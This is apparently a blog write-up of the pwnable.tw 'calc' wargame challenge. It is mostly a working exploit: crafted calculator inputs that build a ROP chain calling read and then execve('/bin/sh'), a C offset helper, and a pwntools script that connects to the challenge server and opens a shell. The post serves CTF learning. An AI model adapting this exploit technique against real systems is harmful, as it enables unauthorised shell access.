Wargame/▷ pwnable.tw
[pwnable.tw] calc
Gyeongje
2018. 7. 24. 02:09
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 | +360+1 +361+134595402 #pop_eax (calc function return address) +362-134595399 #3(read syscall num) +363+81545 #pop_edx_ecx_ebx +364-81537 #edx(size) = 8 +365+135106815 #ecx(bss) +366-135106815 #0 ebx(fd) +367-428159 #syscall +368+134167244 #pop_eax +369-134167233 #11(execve syscall num) +370+509711 #pop_edx_ecx_ebx +371-509711 #0(edx) +372-509711 #0(ecx) +373+134678641 #bss(ebx) +374+15 #syscall | cs |
↑ 360을 구한 계산코드
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 | #include <stdio.h> int main(void) { //unsigned int re = 0xffffc70c; unsigned int re = 0xffffcccc; unsigned int ed = 0xffffc728; unsigned int i; unsigned int tmp; unsigned int count = 0; for (i = 0xffffffff; i >= 0; i--) { __asm { mov eax, i mov edx, 0xffffc728 imul eax, 4 add eax, edx add eax, 4 mov tmp, eax } if (tmp == re) { printf("%#x\n", i); break; } } return 0; } | cs |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 | from pwn import * s = remote('chall.pwnable.tw', 10100) #s = process('./calc') payload = [ '+360+1', '+361+134595402', '+362-134595399', '+363+81545', '+364-81537', '+365+135106815', '+366-135106815', '+367-428159', '+368+134167244', '+369-134167233', '+370+509711', '+371-509711', '+372-509711', '+373+134678641', '+374+15'] cmd = '/bin/sh\x00' #main = 0x8049452 p_eax = 0x805c34b p_edx_ecx_ebx = 0x080701d0 bss = 0x80ecf80 sys = 0x8070880 s.recvuntil('===\n') #raw_input('$ ') for i in payload: s.sendline(i) s.recvuntil('\n') s.sendline('') s.sendline(cmd) #read bss s.interactive() | cs |